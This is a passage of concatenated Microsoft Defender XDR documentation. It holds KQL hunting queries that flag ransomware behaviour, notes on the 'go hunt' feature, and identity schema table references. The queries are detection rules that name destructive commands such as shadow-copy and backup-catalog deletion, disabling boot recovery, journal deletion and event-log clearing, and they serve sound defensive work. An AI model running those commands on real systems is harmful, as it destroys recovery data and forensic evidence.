-// Find attempts to stop processes using taskkill.exe
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "taskkill.exe"
-| summarize taskKillCount = dcount(ProcessCommandLine), TaskKillList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 2m)
-| where taskKillCount > 10
-```
-
-### Stopping processes using _net stop_
-
-This query checks for attempts to stop at least 10 separate processes using the _net stop_ command. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2RQUvDUBCE5yz0P4ScUijWereXVkGQIti7aA1pqakhL7VVxN_ebzc1NBChPLJv2Z2ZN5sdaqhId1ppozeyF1WcVLkK7kCl0gcx-F2QFSrJFmACJ3XMlmgKGfmGWnXC6OlCU2qfIIz12OLfUk_h2FuG_IG505JayRdpDit3bIW33B2M3WeGSqIRrvudTJvpnWzmPKvc6JcYHx1eEvd8savV07e9TchzTt198AlNZ0kluNLfjHHjIPAvak4J_tvx9XtPR6ypbn1icxShvGgqyVkO-hrAm7VUrRcaTWOs6T_7hs7XjfSqL-Lpvu5BDLxjqKRjI9a9Juvew__T2x5HutIB3T1qt4QCAAA&runQuery=true&timeRangeId=week)
-
-```kusto
-// Find attempts to stop processes using net stop
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "net.exe" and ProcessCommandLine has "stop"
-| summarize netStopCount = dcount(ProcessCommandLine), NetStopList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 2m)
-| where netStopCount > 10
-```
-### Deletion of data on multiple drives using _cipher.exe_
-This query checks for attempts to delete data on multiple drives using _cipher.exe_. This activity is typically done by ransomware to prevent recovery of data after encryption. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI1SXUvDQBCcZ8H_cOQpgWLoD7AvVUEo4oPvElO1pblUcmn9QPztzk6TEuEsIdzdZndndm73cuRwWGDLb0PrhWfDs8Qab1jhmX8X3D-4HJbcK66W0Rqv8hT8K4RsiPW0PHbMasVQdbiGf3vaAec4wxWtPT0lz3vhSsUCrpVVE33I_Cb6vdNhTA9EeeVaVc8KDjOugmq2SDFlrSyKvCHS1NwJZ55L_HBPondNGDGWXP2JdyMnv927UnXHWwf6l4MunupXTOPfXszVT8_smriFOCxrRU-QclOQDLgCNRwQ1u8vZc8H2o1xp-7a7U1NefSko6pnmKjakNVi4chpiA39j-rGeF6HJ3xyH76NW2ZMFLGsNDJ9i05pZSPmVdDfq-jncfqtOuU5zSuQz6Zq92w7Hfbm-9cUm-d_vZ9J9S81O2KIfAMAAA&runQuery=true&timeRangeId=week)
-
-```kusto
-// Look for cipher.exe deleting data from multiple drives
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "cipher.exe"
-// cipher.exe /w flag used for deleting data
-| where ProcessCommandLine has "/w"
-| summarize CipherCount = dcount(ProcessCommandLine),
-CipherList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
-// cipher.exe accessing multiple drives in a short timeframe
-| where CipherCount > 1
-```
-
-### Clearing of forensic evidence from event logs using _wevtutil_
-
-This query checks for attempts to clear at least 10 log entries from event logs using _wevtutil_. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRTU_CQBCG37OJ_2HDqSQkwMGjXgoHEg4cUI-m2hUaqGu6BaPxx_vsEFCTxmA225nOvB_tzFBDOc0VOBuyZ2JD3CnKEwMVpzfyPbVWlba8t9Sdnsi9CsPXdLfWf7Wq4xm0QuVSF5oYv4LhtQAfLIucKXWvF5gH5Ke5rak1prKEVRu2xalG3emGW6AdlGmsUv1O5m-fnLzmFHiV_G9FTKg1lUjs6Z5vucPvljsD0TOXhP6_Vm7841dFZnPAN2A_DDu36eSnCSbNnc3B6Zpb4nasZGf59zWA963orZdcEiKelBNvQ_fBNny-utOj3nn-3OUMxMA6CZV1bCt1r8i6d_TXFNKWxxrpC48hm8miAgAA&runQuery=true&timeRangeId=week)
-
-```kusto
-// Look for use of wevtutil to clear multiple logs
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where ProcessCommandLine has "WEVTUTIL" and ProcessCommandLine has "CL"
-| summarize LogClearCount = dcount(ProcessCommandLine), ClearedLogList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m)
-| where LogClearCount > 10
-```
-
-### Turning off services using _sc.exe_
-
-This query checks for attempts to turn off at least 10 existing services using _sc.exe_. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWST2vCQBDF31nodwg5RZCqhx7bi3ooeCjovaQxraIxxfU_fvj-ZoiiEIqlhM3Ozrz3ZnZm22or0lAl3xzrk33FHpTpUbn2rEgTzfCk-tACa6kvR-Qgt5wzrKAHNdTHOnveiJZVLGiAP4e5rpAnFHaauoZlGMMqHLsmT6FvfC-slFylEnWpoVnLvM3Twy74UnJNuJdVa6gpnsAe-81iVzbE3_kZiCV9mlHZf3Sue5pzii-3C9pU3BWYo_NGKPdvGJZh4x2N9Owzyi6e5K5qmmrVKg_9dNY11hzvu0_8fu0ItQP_6zfxCqLlEUMlNVO36BNW_ax_74K9l646-gFts39I1AIAAA&runQuery=true&timeRangeId=week)
-
-```kusto
-// Look for sc.exe disabling services
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where ProcessCommandLine has "sc" and ProcessCommandLine has "config" and ProcessCommandLine has "disabled"
-| summarize ScDisableCount = dcount(ProcessCommandLine), ScDisableList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m)
-| where ScDisableCount > 10
-```
-
-### Turning off System Restore
-
-This query identifies attempts to stop System Restore and prevent the system from creating restore points, which can be used to recover data encrypted by ransomware. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAK2S3UrDQBCFz7XgO6y9id4o6HWvrIVCkaJPENOYFNumZGO1ID673w4xJA1isbJMZnZ-zpzM7EiptlooQc9UqjDLc-7wp1qrwj7Via44MzK35FTotTI5PXMr0aVe8cy15NzoGo-zqg_0m3KQSsRpQtbC6uMGpdt3jHeJfU_GymqG-uQb9XpcEn1HIuvmGpZT0Aq99Dim4G3ousNO8K04sSE6EEN22kL6jvzO-LaDNW2QzqxLmGBsPo9vUMt_oA8Na3DQv3vwcmPiifpmds48jkhut8T2FLikxm_T4bI_m_6uQt-wrXO28lPPSBcdziOqPFlP9RYy47tDKtuZM07hVtSvaJ_HYRPL63-NyMgtmtWv5684jy2WDx2O0ZEM562ZBLQvURxur6gDAAA&runQuery=true&timeRangeId=week)
-
-```kusto
-DeviceProcessEvents
-//Pivoting for rundll32
-| where InitiatingProcessFileName =~ 'rundll32.exe'
-//Looking for empty command line
-and InitiatingProcessCommandLine !contains " " and InitiatingProcessCommandLine != ""
-//Looking for schtasks.exe as the created process
-and FileName in~ ('schtasks.exe')
-//Disabling system restore
-and ProcessCommandLine has 'Change' and ProcessCommandLine has 'SystemRestore'
-and ProcessCommandLine has 'disable'
-```
-
-### Backup deletion
-
-This query identifies use of _wmic.exe_ to delete shadow copy snapshots prior to encryption. [Run query](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWS2wqCQBCG_-ugd5CupTfoqgMIEV70AqFLGp5QyYLo2fsavEjxwlhWZ7-df2Z2dndyuitVxD9UrdKshrGHOxVqsZda6CVPnRJYzfR0QJVhnXRRbmSjN98VXrlFXEMfzNWkfphti50zLmSMdURfmFcCaSxqY3aMX4eqVKUn1OsV_8eLWX_rbwcVVhblBovY8bT76U-AxoedWeeWp7WzV0YDMqSQFNZavuuopnHH_Iku-lbJnLPMyxnYDTp4bZ5P9M5uNpsZIWSn7l_CuNoPSggb4z4CAAA&runQuery=true&timeRangeId=week)
-
-```kusto
-DeviceProcessEvents
-| where FileName =~ "wmic.exe"
-| where ProcessCommandLine has "shadowcopy" and ProcessCommandLine has "delete"
-| project DeviceId, Timestamp, InitiatingProcessFileName, FileName,
-ProcessCommandLine, InitiatingProcessIntegrityLevel, InitiatingProcessParentFileName
-```
-
-## Check for multiple signs of ransomware activity
-
-Instead of running several queries separately, you can also use a comprehensive query that checks for multiple signs of ransomware activity to identify affected devices. The following consolidated query:
-- Looks for both relatively concrete and subtle signs of ransomware activity-- Weighs the presence of these signs-- Identifies devices with a higher chance of being targets of ransomware -
-When run, this consolidated query returns a list of devices that have exhibited multiple signs of attack. The count of each type of ransomware activity is also shown. To run this consolidated query, copy it directly to the [advanced hunting query editor](https://security.microsoft.com/advanced-hunting).
-
-```kusto
-// Find attempts to stop processes using taskkill.exe
-let taskKill = DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "taskkill.exe"
-| summarize taskKillCount = dcount(ProcessCommandLine), TaskKillList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 2m)
-| where taskKillCount > 10;
-// Find attempts to stop processes using net stop
-let netStop = DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "net.exe" and ProcessCommandLine has "stop"
-| summarize netStopCount = dcount(ProcessCommandLine), NetStopList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 2m)
-| where netStopCount > 10;
-// Look for cipher.exe deleting data from multiple drives
-let cipher = DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "cipher.exe"
-// cipher.exe /w flag used for deleting data
-| where ProcessCommandLine has "/w"
-| summarize CipherCount = dcount(ProcessCommandLine),
-CipherList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 1m)
-// cipher.exe accessing multiple drives in a short timeframe
-| where CipherCount > 1;
-// Look for use of wevtutil to clear multiple logs
-let wevtutilClear = DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where ProcessCommandLine has "WEVTUTIL" and ProcessCommandLine has "CL"
-| summarize LogClearCount = dcount(ProcessCommandLine), ClearedLogList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m)
-| where LogClearCount > 10;
-// Look for sc.exe disabling services
-let scDisable = DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where ProcessCommandLine has "sc" and ProcessCommandLine has "config" and ProcessCommandLine has "disabled"
-| summarize ScDisableCount = dcount(ProcessCommandLine), ScDisableList = make_set(ProcessCommandLine) by DeviceId, bin(Timestamp, 5m)
-| where ScDisableCount > 10;
-// Main query for counting and aggregating evidence
-DeviceProcessEvents
-| where Timestamp > ago(1d)
-| where FileName =~ "vssadmin.exe" and ProcessCommandLine has_any("list shadows", "delete shadows")
-or FileName =~ "fsutil.exe" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal"
-or ProcessCommandLine has("bcdedit") and ProcessCommandLine has_any("recoveryenabled no", "bootstatuspolicy ignoreallfailures")
-or ProcessCommandLine has "wbadmin" and ProcessCommandLine has "delete" and ProcessCommandLine has_any("backup", "catalog", "systemstatebackup")
-or (ProcessCommandLine has "wevtutil" and ProcessCommandLine has "cl")
-or (ProcessCommandLine has "wmic" and ProcessCommandLine has "shadowcopy delete")
-or (ProcessCommandLine has "sc" and ProcessCommandLine has "config" and ProcessCommandLine has "disabled")
-| extend Bcdedit = iff(ProcessCommandLine has "bcdedit" and ProcessCommandLine has_any("recoveryenabled no", "bootstatuspolicy ignoreallfailures"), 1, 0)
-| extend ShadowCopyDelete = iff (ProcessCommandLine has "shadowcopy delete", 1, 0)
-| extend VssAdminShadows = iff(ProcessCommandLine has "vssadmin" and ProcessCommandLine has_any("list shadows", "delete shadows"), 1, 0)
-| extend Wbadmin = iff(ProcessCommandLine has "wbadmin" and ProcessCommandLine has "delete" and ProcessCommandLine has_any("backup", "catalog", "systemstatebackup"), 1,0)
-| extend Fsutil = iff(ProcessCommandLine has "fsutil" and ProcessCommandLine has "usn" and ProcessCommandLine has "deletejournal", 1, 0)
-| summarize FirstActivity = min(Timestamp), ReportId = any(ReportId), Commands = make_set(ProcessCommandLine) by DeviceId, Fsutil, Wbadmin, ShadowCopyDelete, Bcdedit, VssAdminShadows, bin(Timestamp, 6h)
-// Joining extra evidence
-| join kind=leftouter (wevtutilClear) on $left.DeviceId == $right.DeviceId
-| join kind=leftouter (cipher) on $left.DeviceId == $right.DeviceId
-| join kind=leftouter (netStop) on $left.DeviceId == $right.DeviceId
-| join kind=leftouter (taskKill) on $left.DeviceId == $right.DeviceId
-| join kind=leftouter (scDisable) on $left.DeviceId == $right.DeviceId
-| extend WevtutilUse = iff(LogClearCount > 10, 1, 0)
-| extend CipherUse = iff(CipherCount > 1, 1, 0)
-| extend NetStopUse = iff(netStopCount > 10, 1, 0)
-| extend TaskkillUse = iff(taskKillCount > 10, 1, 0)
-| extend ScDisableUse = iff(ScDisableCount > 10, 1, 0)
-// Adding up all evidence
-| mv-expand CommandList = NetStopList, TaskKillList, ClearedLogList, CipherList, Commands, ScDisableList
-// Format results
-| summarize BcdEdit = iff(make_set(Bcdedit) contains "1" , 1, 0), NetStop10PlusCommands = iff(make_set(NetStopUse) contains "1", 1, 0), Wevtutil10PlusLogsCleared = iff(make_set(WevtutilUse) contains "1", 1, 0),
-CipherMultipleDrives = iff(make_set(CipherUse) contains "1", 1, 0), Fsutil = iff(make_set(Fsutil) contains "1", 1, 0), ShadowCopyDelete = iff(make_set(ShadowCopyDelete) contains "1", 1, 0),
-Wbadmin = iff(make_set(Wbadmin) contains "1", 1, 0), TaskKill10PlusCommand = iff(make_set(TaskkillUse) contains "1", 1, 0), VssAdminShadow = iff(make_set(VssAdminShadows) contains "1", 1, 0),
-ScDisable = iff(make_set(ScDisableUse) contains "1", 1, 0), TotalEvidenceCount = count(CommandList), EvidenceList = make_set(Commands), StartofBehavior = min(FirstActivity) by DeviceId, bin(Timestamp, 1d)
-| extend UniqueEvidenceCount = BcdEdit + NetStop10PlusCommands + Wevtutil10PlusLogsCleared + CipherMultipleDrives + Wbadmin + Fsutil + TaskKill10PlusCommand + VssAdminShadow + ScDisable + ShadowCopyDelete
-| where UniqueEvidenceCount > 2
-```
-### Understand and tweak the query results
-
-The consolidated query returns the following results:
--- **DeviceId**ΓÇöidentifies the affected device -- **TimeStamp**ΓÇöfirst time any sign of ransomware activity was observed on the device-- **Specific signs of activity**ΓÇöthe count for each sign shown in multiple columns, such as _BcdEdit_ or _FsUtil_-- **TotalEvidenceCount**ΓÇönumber of observed signs-- **UniqueEvidenceCount**ΓÇönumber of types of observed signs--
-*Query results showing affected devices and counts of various signs of ransomware activity*
-
-By default, the query result lists only devices that have more than two types of ransomware activity. To see all devices with any sign of ransomware activity, modify the following `where` operator and set the number to zero (0). To see fewer devices, set a higher number.
-
-```kusto
-| where UniqueEvidenceCount > 2
-```
-
-## More ransomware resources
-
-Key information from Microsoft:
--- [The growing threat of ransomware](https://blogs.microsoft.com/on-the-issues/2021/07/20/the-growing-threat-of-ransomware/), Microsoft On the Issues blog post on July 20, 2021-- [Human-operated ransomware](/security/ransomware/human-operated-ransomware)-- [Quickly deploy ransomware preventions](/security/ransomware/protect-against-ransomware)-- [2021 Microsoft Digital Defense Report](https://www.microsoft.com/security/business/microsoft-digital-defense-report) (see pages 10-19)-- [Ransomware: A pervasive and ongoing threat](https://security.microsoft.com/threatanalytics3/05658b6c-dc62-496d-ad3c-c6a795a33c27/overview) threat analytics report in the Microsoft Defender portal-
-Microsoft 365:
--- [Deploy ransomware protection for your Microsoft 365 tenant](/microsoft-365/solutions/ransomware-protection-microsoft-365)-- [Maximize Ransomware Resiliency with Azure and Microsoft 365](https://azure.microsoft.com/resources/maximize-ransomware-resiliency-with-azure-and-microsoft-365/)-- [Ransomware incident response playbooks](/security/ransomware/)-- [Malware and ransomware protection](/compliance/assurance/assurance-malware-and-ransomware-protection)-- [Protect your Windows PC from ransomware](https://support.microsoft.com//windows/protect-your-pc-from-ransomware-08ed68a7-939f-726c-7e84-a72ba92c01c3)-- [Handling ransomware in SharePoint Online](/sharepoint/troubleshoot/security/handling-ransomware-in-sharepoint-online)-- [Threat analytics reports for ransomware](https://security.microsoft.com/threatanalytics3?page_size=30&filters=tags%3DRansomware&ordering=-lastUpdatedOn&fields=displayName,alertsCount,impactedEntities,reportType,createdOn,lastUpdatedOn,tags,flag) in the Microsoft Defender portal-
-Microsoft Azure:
--- [Azure Defenses for Ransomware Attack](https://azure.microsoft.com/resources/azure-defenses-for-ransomware-attack/)-- [Maximize Ransomware Resiliency with Azure and Microsoft 365](https://azure.microsoft.com/resources/maximize-ransomware-resiliency-with-azure-and-microsoft-365/)-- [Backup and restore plan to protect against ransomware](/azure/security/fundamentals/backup-plan-to-protect-against-ransomware)-- [Help protect from ransomware with Microsoft Azure Backup](https://www.youtube.com/watch?v=VhLOr2_1MCg) (26-minute video)-- [Recovering from systemic identity compromise](/azure/security/fundamentals/recover-from-identity-compromise)-- [Advanced multistage attack detection in Microsoft Sentinel](/azure/sentinel/fusion#ransomware)-- [Fusion Detection for Ransomware in Microsoft Sentinel](https://techcommunity.microsoft.com/t5/azure-sentinel/what-s-new-fusion-detection-for-ransomware/ba-p/2621373)---
-Microsoft Defender for Cloud Apps:
--- [Create anomaly detection policies in Defender for Cloud Apps](/cloud-app-security/anomaly-detection-policy)-
-Microsoft Security team blog posts:
--- [Three steps to prevent and recover from ransomware (September 2021)](https://www.microsoft.com/security/blog/2021/09/07/3-steps-to-prevent-and-recover-from-ransomware/)-- [A guide to combatting human-operated ransomware: Part 1 (September 2021)](https://www.microsoft.com/security/blog/2021/09/20/a-guide-to-combatting-human-operated-ransomware-part-1/)-
- Key steps on how Microsoft's Detection and Response Team (DART) conducts ransomware incident investigations.
--- [A guide to combatting human-operated ransomware: Part 2 (September 2021)](https://www.microsoft.com/security/blog/2021/09/27/a-guide-to-combatting-human-operated-ransomware-part-2/)-
- Recommendations and best practices.
--- [Becoming resilient by understanding cybersecurity risks: Part 4ΓÇönavigating current threats (May 2021)](https://www.microsoft.com/security/blog/2021/05/26/becoming-resilient-by-understanding-cybersecurity-risks-part-4-navigating-current-threats/)-
- See the **Ransomware** section.
--- [Human-operated ransomware attacks: A preventable disaster (March 2020)](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/)-
- Includes attack chain analyses of actual attacks.
--- [Ransomware responseΓÇöto pay or not to pay? (December 2019)](https://www.microsoft.com/security/blog/2019/12/16/ransomware-response-to-pay-or-not-to-pay/)-- [Norsk Hydro responds to ransomware attack with transparency (December 2019)](https://www.microsoft.com/security/blog/2019/12/17/norsk-hydro-ransomware-attack-transparency/)----
-## Related articles
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Go Hunt https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-go-hunt.md
- Title: Get relevant info about an entity with go hunt
-description: Learn how to use the go hunt tool on to quickly query for relevant information about an entity or event using advanced hunting.
--
- - NOCSH
----
- - m365-security
- - tier1
- Previously updated : 08/31/2023--
-# Quickly hunt for entity or event information with go hunt
--
-**Applies to:**
-- Microsoft Defender XDR-
-With the *go hunt* action, you can quickly investigate events and various entity types using powerful query-based [advanced hunting](advanced-hunting-overview.md) capabilities. This action automatically runs an advanced hunting query to find relevant information about the selected event or entity.
-
-The *go hunt* action is available in various sections of Microsoft Defender XDR. This action is available to view once event or entity details are displayed. For example, you can use the *go hunt* option from the following sections:
--- In the [incident page](investigate-incidents.md#summary), you can review details about users, devices, and many other entities associated with an incident. As you select an entity, you get additional information and the various actions you could take on that entity. In the example below, a mailbox is selected, showing details about the mailbox and the option to hunt for more information about the mailbox.-
- :::image type="content" source="../../media/go-hunt-1-incident.png" alt-text="The Mailboxes page with the Go hunt option in the Microsoft Defender portal " lightbox="../../media/go-hunt-1-incident.png":::
--- In the incident page, you can also access a list of entities under the **Evidence** tab. Selecting one of those entities provides an option to quickly hunt for information about that entity.-
- :::image type="content" source="../../media/go-hunt-2-entity.png" alt-text="The Go hunt option for a piece of evidence in the Incident page in Microsoft Defender portal" lightbox="../../media/go-hunt-2-entity.png":::
--- When viewing the timeline for a device, you can select an event in the timeline to view additional information about that event. Once an event is selected, you get the option to hunt for other relevant events in advanced hunting.-
- :::image type="content" source="../../media/go-hunt-3-event.png" alt-text="The Hunt for related events option on an event's page in the Timelines tab in Microsoft Defender portal" lightbox="../../media/go-hunt-3-event.png":::
-
-Selecting **Go hunt** or **Hunt for related events** passes different queries, depending on whether you've selected an entity or an event.
-
-## Query for entity information
-
-You can use *go hunt* to query for information about a user, device, or any other type of entity; the query checks all relevant schema tables for any events involving that entity to return information. To keep the results manageable, the query is:
--- scoped to around the same time period as the earliest activity in the past 30 days that involves the entity-- associated with the incident.-
-Here is an example of the go hunt query for a device:
-
-```kusto
-let selectedTimestamp = datetime(2020-06-02T02:06:47.1167157Z);
-let deviceName = "fv-az770.example.com";
-let deviceId = "device-guid";
-search in (DeviceLogonEvents, DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceImageLoadEvents, DeviceEvents, DeviceImageLoadEvents, IdentityLogonEvents, IdentityQueryEvents)
-Timestamp between ((selectedTimestamp - 1h) .. (selectedTimestamp + 1h))
-and DeviceName == deviceName
-// or RemoteDeviceName == deviceName
-// or DeviceId == deviceId
-| take 100
-```
-
-### Supported entity types
-
-You can use the *go hunt* option after selecting any of these entity types:
--- Devices-- Email clusters-- Emails-- Files-- Groups-- IP addresses-- Mailboxes-- Users-- URLs-
-## Query for event information
-
-When using *go hunt* to query for information about a timeline event, the query checks all relevant schema tables for other events around the time of the selected event. For example, the following query lists events in various schema tables that occurred around the same time period on the same device:
-
-```kusto
-// List relevant events 30 minutes before and after selected LogonAttempted event
-let selectedEventTimestamp = datetime(2020-06-04T01:29:09.2496688Z);
-search in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents, DeviceLogonEvents)
- Timestamp between ((selectedEventTimestamp - 30m) .. (selectedEventTimestamp + 30m))
- and DeviceId == "079ecf9c5798d249128817619606c1c47369eb3e"
-| sort by Timestamp desc
-| extend Relevance = iff(Timestamp == selectedEventTimestamp, "Selected event", iff(Timestamp < selectedEventTimestamp, "Earlier event", "Later event"))
-| project-reorder Relevance
-```
-
-## Adjust the query
-
-With some knowledge of the [query language](advanced-hunting-query-language.md), you can adjust the query to your preference. For example, you can adjust this line, which determines the size of the time window:
-
-```kusto
-Timestamp between ((selectedTimestamp - 1h) .. (selectedTimestamp + 1h))
-```
-
-In addition to modifying the query to get more relevant results, you can also:
--- [View the results as charts](advanced-hunting-query-results.md#view-query-results-as-a-table-or-chart)-- [Create a custom detection rule](custom-detection-rules.md)-
-> [!NOTE]
-> Some tables in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Custom detection rules](custom-detection-rules.md)
security Advanced Hunting Identitydirectoryevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-identitydirectoryevents-table.md
- Title: IdentityDirectoryEvents table in the advanced hunting schema
-description: Learn about domain controller and Active Directory events in the IdentityDirectoryEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# IdentityDirectoryEvents
---
-**Applies to:**
-- Microsoft Defender XDR-
-The `IdentityDirectoryEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains events involving an on-premises domain controller running Active Directory (AD). This table captures various identity-related events, like password changes, password expiration, and user principal name (UPN) changes. It also captures system events on the domain controller, like scheduling of tasks and PowerShell activity. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details |
-| `Application` | `string` | Application that performed the recorded action |
-| `TargetAccountUpn` | `string` | User principal name (UPN) of the account that the recorded action was applied to |
-| `TargetAccountDisplayName` | `string` | Display name of the account that the recorded action was applied to |
-| `TargetDeviceName` | `string` | Fully qualified domain name (FQDN) of the device that the recorded action was applied to |
-| `DestinationDeviceName` | `string` | Name of the device running the server application that processed the recorded action |
-| `DestinationIPAddress` | `string` | IP address of the device running the server application that processed the recorded action |
-| `DestinationPort` | `int` | Destination port of the activity |
-| `Protocol` | `string` | Protocol used during the communication |
-| `AccountName` | `string` | User name of the account |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `IPAddress` | `string` | IP address assigned to the device during communication |
-| `Port` | `int` | TCP port used during communication |
-| `Location` | `string` | City, country/region, or other geographic location associated with the event |
-| `ISP` | `string` | Internet service provider associated with the IP address |
-| `ReportId` | `string` | Unique identifier for the event |
-| `AdditionalFields` | `dynamic` | Additional information about the entity or event |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Identityinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-identityinfo-table.md
- Title: IdentityInfo table in the advanced hunting schema
-description: Learn about user account information in the IdentityInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- usx-security-- tier3- Previously updated : 03/29/2024
-appliesto:
-- Microsoft Defender XDR -- Microsoft Sentinel in the Microsoft Defender portal--
-# IdentityInfo
-
-The `IdentityInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about user accounts obtained from various services, including Microsoft Entra ID. Use this reference to construct queries that return information from this table.
-
-This table was renamed from `AccountInfo`. During renames, all queries saved in the portal are automatically updated. Check queries you have saved elsewhere.
-
-Microsoft Sentinel uses a slightly expanded version of this table in Log Analytics. For more information, see [Microsoft Sentinel UEBA reference | IdentityInfo table](/azure/sentinel/ueba-reference)
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` [*](#mdi-only) | `datetime` | The date and time that the line was written to the database. <br><br>This is used when there are multiple lines for each identity, such as when a change is detected, or if 24 hours have passed since the last database line was added. |
-| `ReportId` [*](#mdi-only) | `string` | Unique identifier for the event |
-| `AccountObjectId` | `string` | Unique identifier for the account in Microsoft Entra ID |
-| `AccountUpn` | `string` | User principal name (UPN) of the account |
-| `OnPremSid` | `string` | On-premises security identifier (SID) of the account |
-| `AccountDisplayName` | `string` | Name of the account user displayed in the address book. Typically a combination of a given or first name, a middle initial, and a last name or surname. |
-| `AccountName` | `string` | User name of the account |
-| `AccountDomain` [*](#mdi-only) | `string` | Domain of the account |
-| `Type` [*](#mdi-only) | `string` | Type of record |
-| `DistinguishedName` [*](#mdi-only) | string | The user's [distinguished name](/previous-versions/windows/desktop/ldap/distinguished-names) |
-| `CloudSid` | `string` | Cloud security identifier of the account |
-| `GivenName` | `string` | Given name or first name of the account user |
-| `Surname` | `string` | Surname, family name, or last name of the account user |
-| `Department` | `string` | Name of the department that the account user belongs to |
-| `JobTitle` | `string` | Job title of the account user |
-| `EmailAddress` | `string` | SMTP address of the account |
-| `SipProxyAddress` | `string` | Voice over IP (VOIP) session initiation protocol (SIP) address of the account |
-| `Address` | `string` | Address of the account user |
-| `City` | `string` | City where the account user is located |
-| `Country` | `string` | Country/Region where the account user is located |
-| `IsAccountEnabled` | `boolean` | Indicates whether the account is enabled or not |
-| `Manager` [*](#mdi-only) | `string` | The listed manager of the account user |
-| `Phone` [*](#mdi-only) | `string` | The listed phone number of the account user|
-| `CreatedDateTime` [*](#mdi-only) | `datetime` | Date and time when the account user was created |
-| `SourceProvider` [*](#mdi-only) | `string` |The identity's source, such as Microsoft Entra ID, Active Directory, or a [hybrid identity](/azure/active-directory/hybrid/what-is-provisioning) synchronized from Active Directory to Azure Active Directory |
-| `ChangeSource` [*](#mdi-only) | `string` |Identifies which identity provider or process triggered the addition of the new row. For example, the `System-UserPersistence` value is used for any rows added by an automated process.|
-| `Tags` [*](#mdi-only) | `dynamic` | Tags assigned to the account user by Defender for Identity |
-| `AssignedRoles` [*](#mdi-only) | `dynamic` | For identities from Microsoft Entra-only, the roles assigned to the account user|
-| `TenantId` | `string` | Unique identifier representing your organization's instance of Microsoft Entra ID |
-| `SourceSystem` [*](#mdi-only) | `string` | The source system for the record|
-
